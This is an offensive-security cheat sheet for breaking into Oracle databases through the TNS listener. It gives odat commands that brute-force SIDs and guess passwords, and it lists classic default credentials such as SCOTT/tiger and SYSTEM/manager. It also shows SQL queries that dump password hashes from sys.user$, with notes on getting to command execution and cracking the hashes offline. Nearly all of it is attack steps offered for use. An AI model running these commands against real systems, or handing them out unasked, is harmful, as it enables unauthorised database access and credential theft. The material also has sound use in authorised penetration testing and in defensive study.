Oracle access is a two-stage problem: first find a valid SID behind the TNS listener, then find an account that works against it. Both are automated by odat, and default credentials make the second stage succeed far more often than it should.
Listener and SID enumeration#
# Comprehensive scan: listener info, SID guessing, credential testing
odat all -s <target> -p 1521
# Just enumerate SIDs (brute and version-based)
odat sidguesser -s <target> -p 1521
Default and weak accounts#
Oracle ships a long list of default accounts, and many survive in the wild:
# Guess credentials against a known SID (default account list + wordlists)
odat passwordguesser -s <target> -p 1521 -d <SID> --accounts-file accounts.txt
# Classic defaults worth trying first
SYSTEM/manager SYS/change_on_install SCOTT/tiger DBSNMP/dbsnmp OUTLN/outln
Post-authentication enumeration#
-- with a session (sqlplus user/pass@//target/SID)
SELECT * FROM user_role_privs; -- my roles (DBA?)
SELECT name, password, spare4 FROM sys.user$; -- password hashes (needs privilege)
SELECT * FROM session_privs; -- my system privileges
Exploitation notes#
- A valid SID is the prerequisite for everything, so run
sidguesserfirst; a wrong or missing SID makes credential tests meaningless. - DBA or a role with
CREATE PROCEDURE/CREATE ANY ...is the gate to command execution; checkuser_role_privsimmediately. sys.user$hashes (and the 11g+spare4SHA values) crack offline, extending access to other instances where accounts are reused.- Oracle default accounts are the single most reliable foothold, so exhaust the default list before deeper brute force.
Tools#
- ODAT (
all,sidguesser,passwordguesser): end-to-end listener, SID, and credential enumeration. - sqlplus / python-oracledb: authenticated session for schema and hash extraction.
- nmap
oracle-sid-brute: alternative SID enumeration.